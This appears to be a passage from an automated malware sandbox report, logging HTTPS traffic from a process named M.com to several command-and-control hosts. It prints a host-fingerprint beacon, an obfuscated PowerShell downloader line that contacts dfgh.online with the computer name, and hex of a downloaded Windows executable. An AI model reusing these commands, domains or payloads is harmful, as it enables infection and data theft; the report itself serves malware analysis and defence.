                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: 9f 3b aa 67 8e fe a8 73 58 4a ca 7b 27 0a ef ee 4d 38 ac e1 f6 77 5c cd d9 3c 6a 31 06 a3 19 ad dd c8 98 c2 3b 80 b0 3f 90 62 ed 07 e8 c1 b8 ff 55 da 49 52 27 8a 3c 83 94 55 18 9d 6f a4 af 04 b4 42 b2 6e 12 7a 6c 9d e5 2d 71 a4 21 9a 9e 6d d3 36 0a a0 31 62 74 eb 9c d6 f0 68 bd 73 13 23 9d 92 8a 1d b2 d1 c9 5b 48 1a 17 bf c5 27 89 d8 85 94 b2 73 1a a4 76 08 cd 8b 0b f8 5a 5c 0d bd 12 43 b5 a8 d2 db 50 4f 1a e5 c8 f7 b7 7c c4 07 61 9e f9 3e 7d 9a 04 ea de 03 5a ed 1b 95 33 3f 48 76 47 4c a7 36 bf 06 0f 55 fc 20 e9 88 b8 5e 81 14 ee 58 d4 8d e6 cd f3 59 c7 9a cc 80 ae 99 2f 83 0c 14 b8 d2 a2 38 40 7b cd f3 3e 7d 8e e6 02 62 fc 79 bd 7f a5 03 bb 49 f6 4f 35 72 35 c2 fb ae 19 8c d5 75 12 0a 6d c9 6d 5c b4 1c ff ca 26 81 f5 48 e2 7a ef 0d 0f 17 cc 5f 57 b8 9f
                                                                                                                                                                                                                                                              Data Ascii: ;gsXJ{'M8w\<j1;?bUIR'<UoBnzl-q!m61bths#[H'svZ\CPO|a>}Z3?HvGL6U ^XY/8@{>}byIO5r5umm\&Hz_W
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: be 3a c3 0e 49 ff 78 57 ff 5d 0f 5d d1 ff c2 4f 6c cf db 57 88 fa 4d 8a 3b 7d cc 41 d6 79 a1 2d ec 17 51 15 6e 2f 42 79 92 bc cd c0 09 b2 02 64 d8 ba d1 5a 94 bf 77 2f 6c 51 b5 d6 b3 2e 6f fd 60 e6 6d 18 ef 19 63 25 b1 67 3d 45 23 87 66 ba a4 7c 01 e5 6c 1e 28 83 f8 79 4a 76 88 26 0c dc 77 e6 13 51 70 45 31 a6 ef 81 5d a2 78 ff bf af 50 57 a5 7a 6a 69 1f 02 85 e7 8e db d0 69 1d 24 15 14 c8 52 bd 40 85 e1 70 d4 0e b0 80 5a db c5 ca a5 51 51 30 2a 1e 45 c3 c3 84 41 b8 02 63 6f 26 88 7d 47 05 c4 16 77 00 60 cf e5 20 fe 6d 98 60 0c a9 6f b5 7d 1f 39 e9 80 7b 7b ad 4a 7f 77 bc 7a 8e 70 cb 01 3c f6 1c c5 01 a2 78 fd ac cf fe 5b f0 81 f0 d0 c0 0e 16 30 ca 1d e3 8e 13 3e 87 2d 2a ea f8 39 5f 57 0b 8a 49 bb a3 a1 35 85 d5 b7 46 08 0f 04 82 8d 81 50 5d e2 a9 61 8d
                                                                                                                                                                                                                                                              Data Ascii: :IxW]]OlWM;}Ay-Qn/BydZw/lQ.o`mc%g=E#f|l(yJv&wQpE1]xPWzjii$R@pZQQ0*EAco&}Gw` m`o}9{{Jwzp<x[0>-*9_WI5FP]a
                                                                                                                                                                                                                                                              2025-01-06 11:16:52 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ftj4jq7hru9rhpmlsco9nujv74; expires=Fri, 02 May 2025 05:03:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18pe6v4g9BdEhlKhIORyhR%2FfOsRrEaJeICpcJLfKhzNq3HUm5jGxwwMgNfhRGgx9fDYAk3T071qwUVVqHDo%2BwAg4%2FkT4YMctQNob5D8m4esveJqTJ%2FBkCuZJGhboqkt6Yhk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c582b7e19c7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1787&rtt_var=674&sent=340&recv=609&lost=0&retrans=0&sent_bytes=2836&recv_bytes=596010&delivery_rate=1618625&cwnd=146&unsent_bytes=0&cid=04aa5fd750f193a1&ts=1642&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.2.549910104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:52 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 113
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:52 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=59AE76206C2B06176D75A801C764DBB8
                                                                                                                                                                                                                                                              2025-01-06 11:16:53 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=f5nltevmc8evq44g2hsjst0c5g; expires=Fri, 02 May 2025 05:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jBdnGS2Y3n1G5YDF1m050h2BKHU60QzJP2wcVvu2%2F0cxamWdxgr3vLZnWn3V4uft4OHxq1mBhgN%2BFUmSbJLGN8423GS0ty2AJvMjR2eEbNGGQWObsHaw0LCrDHEdVq%2Fo6vY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c655c5480e2-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1458&rtt_var=563&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1013&delivery_rate=1916010&cwnd=120&unsent_bytes=0&cid=c4fa99af9230da2a&ts=475&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:53 UTC218INData Raw: 64 34 0d 0a 36 58 61 4c 69 6d 72 69 58 39 77 4d 68 65 70 67 44 6c 4e 55 6b 48 72 62 49 76 6f 32 6c 49 39 4a 67 31 42 6f 6e 63 44 75 2b 6d 65 79 44 61 6e 2f 53 4e 68 39 74 48 6a 78 6d 68 4d 30 44 33 76 4d 56 62 68 48 6e 55 4f 36 2f 43 48 73 49 44 53 79 2b 4e 76 4e 55 39 74 41 75 62 35 65 31 41 50 7a 66 4f 33 45 46 48 59 6e 64 72 78 59 76 56 62 59 44 4b 61 6a 61 2b 5a 79 55 71 79 39 77 6f 46 46 6e 46 53 78 71 41 4b 57 4b 36 78 2f 76 37 5a 50 55 6e 77 2f 2f 42 4f 72 56 49 39 62 2f 66 77 38 36 6e 34 62 39 61 2b 65 70 6b 69 41 47 50 2f 56 43 59 34 76 67 33 2f 74 69 30 35 36 4b 79 43 79 56 76 6c 45 6a 68 53 75 76 32 57 68 4e 55 71 6e 38 4a 4f 6e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: d46XaLimriX9wMhepgDlNUkHrbIvo2lI9Jg1BoncDu+meyDan/SNh9tHjxmhM0D3vMVbhHnUO6/CHsIDSy+NvNU9tAub5e1APzfO3EFHYndrxYvVbYDKaja+ZyUqy9woFFnFSxqAKWK6x/v7ZPUnw//BOrVI9b/fw86n4b9a+epkiAGP/VCY4vg3/ti056KyCyVvlEjhSuv2WhNUqn8JOn
                                                                                                                                                                                                                                                              2025-01-06 11:16:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.2.549920185.161.251.214431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:53 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: cegu.shop
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 329
                                                                                                                                                                                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "676c9e2a-149"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                                                                                                              Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.2.549927172.67.208.584431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: klipvumisui.shop
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC898INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                                              Content-Length: 8767044
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                                              Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVQibXpBS51UPFE9QpMrZnfHqdc41fwe5jVhvr2ZTIDDupCBggPrWojXUkQ0Xx9tsRzg5RYDBdYm7TGvfgAcq0otn2Z2gy%2FyiEKp0abQIB8O5M7lBKN69GiylQSE3iqb4s%2Fc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c718aa1f799-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2153&min_rtt=1626&rtt_var=1665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=499230&cwnd=97&unsent_bytes=0&cid=e61fa5090ee6ec6d&ts=285&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC471INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00 c2
                                                                                                                                                                                                                                                              Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74 61
                                                                                                                                                                                                                                                              Data Ascii: ESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@Data
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 73 54 79
                                                                                                                                                                                                                                                              Data Ascii: @MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClassTy
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 04 81 40
                                                                                                                                                                                                                                                              Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?@
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53 70
                                                                                                                                                                                                                                                              Data Ascii: AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.TSp
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 77 29 40
                                                                                                                                                                                                                                                              Data Ascii: ruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@w)@
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 02 00 80
                                                                                                                                                                                                                                                              Data Ascii: Boolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d 40 00 43
                                                                                                                                                                                                                                                              Data Ascii: @~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=@C
                                                                                                                                                                                                                                                              2025-01-06 11:16:54 UTC1369INData Raw: 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00
                                                                                                                                                                                                                                                              Data Ascii: Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCopy


                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              High Level Behavior Distribution

